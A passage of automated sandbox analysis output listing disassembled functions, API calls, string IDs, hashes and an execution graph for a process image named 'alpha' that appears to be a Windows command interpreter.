                              • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                              • String ID: GeToken: (%x) '%s'
                              • API String ID: 3282654869-1994581435
                              • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                              • Instruction ID: a8cb9d22287c89f482395b60a8b7a6096b4e12283a189693004d956f287001ff
                              • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                              • Instruction Fuzzy Hash: 8661A361A0D682C6FB14BF1394D8279A2A1AF85794FDC4935CE1D476E9EE3CF840A320
                              APIs
                                • Part of subcall function 00007FF744F0CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDA6
                                • Part of subcall function 00007FF744F0CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDBD
                              • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF744F2827A), ref: 00007FF744F311DC
                              • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF744F2827A), ref: 00007FF744F31277
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcessmemmovewcschr
                              • String ID: &()[]{}^=;!%'+,`~
                              • API String ID: 1135967885-381716982
                              • Opcode ID: bd83934b9501f045900d4cea0c34526f969d72289539c66b600af79ca04ff41e
                              • Instruction ID: bdb10c7fcf60bb9a86ec409df526e6a95f3907fc4b14cf87dcfd671449d6533e
                              • Opcode Fuzzy Hash: bd83934b9501f045900d4cea0c34526f969d72289539c66b600af79ca04ff41e
                              • Instruction Fuzzy Hash: 76719071A0D242C6E760FF17A5C0A79E6A4FB94799F885235CE4D83BD8DE3CE4419B10
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memmovewcsncmp
                              • String ID: 0123456789
                              • API String ID: 3879766669-2793719750
                              • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                              • Instruction ID: 7871da8a5cbb03ad5b02ab7b0e2b0478d6e0a9b6e7a0c6b2c2191c3ae9f9fa78
                              • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                              • Instruction Fuzzy Hash: 4241B522B1D686C6EB25BF27E4406BAA2A4FB44B84F885132DE4D477CDDE3CD4419350
                              APIs
                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F297D0
                                • Part of subcall function 00007FF744F0D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D46E
                                • Part of subcall function 00007FF744F0D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D485
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D4EE
                                • Part of subcall function 00007FF744F0D3F0: iswspace.MSVCRT ref: 00007FF744F0D54D
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D569
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D58C
                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F298D7
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                              • String ID: Software\Classes
                              • API String ID: 2714550308-1656466771
                              • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                              • Instruction ID: 9aad1adb13f797f08c9eb8f9d81cf3b85786b843235d5843a28aa0aa4a7ff230
                              • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                              • Instruction Fuzzy Hash: D5418D22B1D712C2EB00BF17A484479A3A4FB84BD0BD88131DE5D43BE9DE3AE842D750
                              APIs
                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2A0FC
                                • Part of subcall function 00007FF744F0D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D46E
                                • Part of subcall function 00007FF744F0D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D485
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D4EE
                                • Part of subcall function 00007FF744F0D3F0: iswspace.MSVCRT ref: 00007FF744F0D54D
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D569
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D58C
                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2A1FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                              • String ID: Software\Classes
                              • API String ID: 2714550308-1656466771
                              • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                              • Instruction ID: 31fdb2224978eebfab6120d5c0f9a1f8ef0c368123a94d2ffc930aef5cd0261f
                              • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                              • Instruction Fuzzy Hash: 79419D22A1DB52C1EB00FF16E484439A3A5FB84BE0B988131DE1D537E9DE3AE846D710
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleTitle
                              • String ID: -
                              • API String ID: 3358957663-3695764949
                              • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                              • Instruction ID: 567dedb37c6608fa6e958bb3e1a5ad27161864cc832405e11b426251e5b89662
                              • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                              • Instruction Fuzzy Hash: C6317021A0D682C6EB14BF13A884078E6A4EB89B90F9D5135DE0E077D9EF7CE441E724
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmpswscanf
                              • String ID: :EOF
                              • API String ID: 1534968528-551370653
                              • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                              • Instruction ID: 709e72f1f92fa5520eb781d0d50f0901aa146010d9a7f47e8bddd848ed210a76
                              • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                              • Instruction Fuzzy Hash: 99314C31A1CA46C6FB54BF57A8802B8F2E0EF55B50FCC5131EE4E462D9DF2CE841A660
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmp
                              • String ID: /-Y
                              • API String ID: 1886669725-4274875248
                              • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                              • Instruction ID: 93605b6c2bfee62d3588cc919545b91a83583a6a7154d9e10ea71fe71f54d50c
                              • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                              • Instruction Fuzzy Hash: 73212E65A0C665C1EB10BF479584178B6E0BB85FC0F898431DE49577D8DE3CE4A2E314
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID:
                              • String ID: 3$3
                              • API String ID: 0-2538865259
                              • Opcode ID: 20d97ca64ded1831fc5a14ddeeed34ee126ef41525fd7b4cb26341839782f1e3
                              • Instruction ID: b878e8c913dfdab1e5b9da9fad28db2f53291041632704d93e68aa4948094ca9
                              • Opcode Fuzzy Hash: 20d97ca64ded1831fc5a14ddeeed34ee126ef41525fd7b4cb26341839782f1e3
                              • Instruction Fuzzy Hash: CB01F371D5E582CAF314BFA298C8674B660BBA4311FDC5135CE0E015E9DF3C7894A661
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswspacewcschr
                              • String ID: =,;
                              • API String ID: 287713880-1539845467
                              • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                              • Instruction ID: b70bfb644d747138e3695210821f7e8b1714065a401207b67df10f61a06d8683
                              • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                              • Instruction Fuzzy Hash: E8F03121A1C662C6EB60BF03E480175A5E0BF49F41BCD9132DD5D46ADCDF2CE850A621
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106D6
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106F0
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F1074D
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F10762
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                              • Instruction ID: 59fb5f7045792851bd5c14d8019b9b2b3f6aff530c963de63aa67d58d01e9bf9
                              • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                              • Instruction Fuzzy Hash: 8A412772A0D652CAEB15BF12E484579B7B0EB85B90F989035DE4D07BD8DF3CA840E760

                              Execution Graph

                              Execution Coverage:3.9%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:872
                              Total number of Limit Nodes:7
                              execution_graph 18928 7ff744f06be0 18929 7ff744f0cd90 166 API calls 18928->18929 18930 7ff744f06c04 18929->18930 18931 7ff744f06c13 _pipe 18930->18931 18933 7ff744f241a2 18930->18933 18939 7ff744f06c32 18931->18939 18966 7ff744f06e26 18931->18966 18932 7ff744f03278 166 API calls 18932->18933 18934 7ff744f03278 166 API calls 18933->18934 18935 7ff744f241bc 18934->18935 18936 7ff744f2e91c 198 API calls 18935->18936 18937 7ff744f241c1 18936->18937 18941 7ff744f03278 166 API calls 18937->18941 18938 7ff744f06df1 18939->18938 18979 7ff744f0affc _dup 18939->18979 18943 7ff744f241d2 18941->18943 18942 7ff744f06c7d 18942->18933 18945 7ff744f0b038 _dup2 18942->18945 18944 7ff744f2e91c 198 API calls 18943->18944 18946 7ff744f241d7 18944->18946 18947 7ff744f06c93 18945->18947 18949 7ff744f03278 166 API calls 18946->18949 18947->18946 18948 7ff744f0d208 _close 18947->18948 18950 7ff744f06ca4 18948->18950 18951 7ff744f241e4 18949->18951 18981 7ff744f0be00 18950->18981 18952 7ff744f2e91c 198 API calls 18951->18952 18954 7ff744f241e9 18952->18954 18956 7ff744f06ccf _get_osfhandle DuplicateHandle 18957 7ff744f06d07 18956->18957 18958 7ff744f0b038 _dup2 18957->18958 18959 7ff744f06d11 18958->18959 18959->18946 18960 7ff744f0d208 _close 18959->18960 18961 7ff744f06d22 18960->18961 18962 7ff744f06e21 18961->18962 18964 7ff744f0affc _dup 18961->18964 18963 7ff744f2e91c 198 API calls 18962->18963 18963->18966 18965 7ff744f06d57 18964->18965 18965->18937 18967 7ff744f0b038 _dup2 18965->18967 18966->18932 18968 7ff744f06d6c 18967->18968 18968->18946 18969 7ff744f0d208 _close 18968->18969 18970 7ff744f06d7c 18969->18970 18971 7ff744f0be00 659 API calls 18970->18971 18972 7ff744f06d9c 18971->18972 18973 7ff744f0b038 _dup2 18972->18973 18974 7ff744f06da8 18973->18974 18974->18946 18975 7ff744f0d208 _close 18974->18975 18976 7ff744f06db9 18975->18976 18976->18962 18977 7ff744f06dc1 18976->18977 18977->18938 19018 7ff744f06e60 18977->19018 18980 7ff744f0b018 
18979->18980 18980->18942 18982 7ff744f06cc4 18981->18982 18983 7ff744f0be1b 18981->18983 18982->18956 18982->18957 18983->18982 18984 7ff744f0be47 memset 18983->18984 18985 7ff744f0be67 18983->18985 19068 7ff744f0bff0 18984->19068 18987 7ff744f0be73 18985->18987 18988 7ff744f0bf29 18985->18988 18991 7ff744f0beaf 18985->18991 18989 7ff744f0be92 18987->18989 18994 7ff744f0bf0c 18987->18994 18990 7ff744f0cd90 166 API calls 18988->18990 18998 7ff744f0bea1 18989->18998 19022 7ff744f0c620 GetConsoleTitleW 18989->19022 18993 7ff744f0bf33 18990->18993 18991->18982 18996 7ff744f0bff0 185 API calls 18991->18996 18993->18991 18999 7ff744f0bf9e 18993->18999 19002 7ff744f088a8 _wcsicmp 18993->19002 19106 7ff744f0b0d8 memset 18994->19106 18996->18982 18998->18991 19005 7ff744f0af98 2 API calls 18998->19005 19247 7ff744f071ec 18999->19247 19000 7ff744f0bf1e 19000->18991 19004 7ff744f0bf5a 19002->19004 19003 7ff744f0bfa9 19003->18991 19007 7ff744f0cd90 166 API calls 19003->19007 19004->18999 19006 7ff744f0bf5f 19004->19006 19005->18991 19166 7ff744f10a6c 19006->19166 19009 7ff744f0bfbb 19007->19009 19009->18991 19011 7ff744f0bfc7 19009->19011 19013 7ff744f1081c 166 API calls 19011->19013 19012 7ff744f0bf75 19014 7ff744f0b0d8 194 API calls 19012->19014 19013->19012 19015 7ff744f0bf7f 19014->19015 19015->18991 19218 7ff744f15ad8 19015->19218 19020 7ff744f06e6d 19018->19020 19019 7ff744f06eb9 19019->18938 19020->19019 19021 7ff744f15cb4 7 API calls 19020->19021 19021->19020 19024 7ff744f0c675 19022->19024 19029 7ff744f0ca2f 19022->19029 19023 7ff744f1c5fc GetLastError 19023->19029 19025 7ff744f0ca40 17 API calls 19024->19025 19036 7ff744f0c69b 19025->19036 19026 7ff744f03278 166 API calls 19026->19029 19027 7ff744f1855c ??_V@YAXPEAX 19027->19029 19028 7ff744f1291c 8 API calls 19035 7ff744f0c94a 19028->19035 19029->19023 19029->19026 19029->19027 19030 7ff744f0c9b5 19032 7ff744f1855c ??_V@YAXPEAX 19030->19032 19031 7ff744f1855c ??_V@YAXPEAX 19059 7ff744f0c762 19031->19059 19034 
7ff744f0c862 19032->19034 19033 7ff744f0c978 towupper 19033->19035 19040 7ff744f0c872 19034->19040 19043 7ff744f1c6b8 SetConsoleTitleW 19034->19043 19035->19023 19035->19028 19035->19029 19035->19030 19035->19033 19035->19035 19038 7ff744f2ec14 173 API calls 19035->19038 19057 7ff744f1c684 19035->19057 19035->19059 19062 7ff744f089c0 23 API calls 19035->19062 19064 7ff744f0ca16 GetLastError 19035->19064 19036->19029 19036->19030 19036->19035 19037 7ff744f0d3f0 223 API calls 19036->19037 19036->19059 19039 7ff744f0c741 19037->19039 19038->19059 19041 7ff744f0c74d 19039->19041 19045 7ff744f0c8b5 wcsncmp 19039->19045 19042 7ff744f1855c ??_V@YAXPEAX 19040->19042 19046 7ff744f0bd38 207 API calls 19041->19046 19041->19059 19044 7ff744f0c87c 19042->19044 19043->19040 19047 7ff744f18f80 7 API calls 19044->19047 19045->19041 19045->19059 19046->19059 19049 7ff744f0c88e 19047->19049 19048 7ff744f0c83d 19253 7ff744f0cb40 19048->19253 19049->18998 19051 7ff744f0c78a wcschr 19051->19059 19053 7ff744f0c855 19257 7ff744f07a70 19053->19257 19054 7ff744f0ca25 19056 7ff744f03278 166 API calls 19054->19056 19056->19029 19058 7ff744f03278 166 API calls 19057->19058 19060 7ff744f1c675 19058->19060 19059->19029 19059->19031 19059->19035 19059->19048 19059->19051 19059->19054 19061 7ff744f0ca2a 19059->19061 19060->19029 19063 7ff744f19158 7 API calls 19061->19063 19062->19035 19063->19029 19066 7ff744f03278 166 API calls 19064->19066 19066->19060 19069 7ff744f0c0c4 19068->19069 19070 7ff744f0c01c 19068->19070 19069->18985 19071 7ff744f0c022 19070->19071 19072 7ff744f0c086 19070->19072 19073 7ff744f0c030 19071->19073 19074 7ff744f0c113 19071->19074 19075 7ff744f0c144 19072->19075 19088 7ff744f0c094 19072->19088 19076 7ff744f0c039 wcschr 19073->19076 19086 7ff744f0c053 19073->19086 19081 7ff744f0ff70 2 API calls 19074->19081 19074->19086 19077 7ff744f0c151 19075->19077 19094 7ff744f0c1c8 19075->19094 19078 7ff744f0c301 19076->19078 19076->19086 19346 7ff744f0c460 19077->19346 19082 

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                              • String ID: :$:$:$:ON$OFF
                              • API String ID: 972821348-467788257
                              • Opcode ID: ec77655612b2197603e506f96a5fdd07df98b32b07624a2fc81e4f2603e93a28
                              • Instruction ID: e10ee5a522bbb755d48d25c807a506317924d67c08fac7982468edd730a12ed6
                              • Opcode Fuzzy Hash: ec77655612b2197603e506f96a5fdd07df98b32b07624a2fc81e4f2603e93a28
                              • Instruction Fuzzy Hash: 8B227121E0D642C6EB64BF239598279E6A1EF95B81FCD8135CD0E477DDDE3CA840A360

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: InfoLocale$DefaultUsersetlocale
                              • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                              • API String ID: 1351325837-2236139042
                              • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                              • Instruction ID: 20321692938c3197c9f5e0751d63a9c4573fe587406562e17cfcfc786ca07f12
                              • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                              • Instruction Fuzzy Hash: AAF11765B0C642C6EB21BF12E9902B9A6B5BF44B80FD85135CE1D576D8EF3CE905E320

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: QueryValue$CloseOpensrandtime
                              • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                              • API String ID: 145004033-3846321370
                              • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                              • Instruction ID: e2b496c1e0d5a188fab7f3d922bdf882f674ab859588042ab8809fb3fd741c34
                              • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                              • Instruction Fuzzy Hash: 7DE1403251D682C6E750BF12E49057AF7A0FB84745F886135EE8E42A9CDF7CE944EB20

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
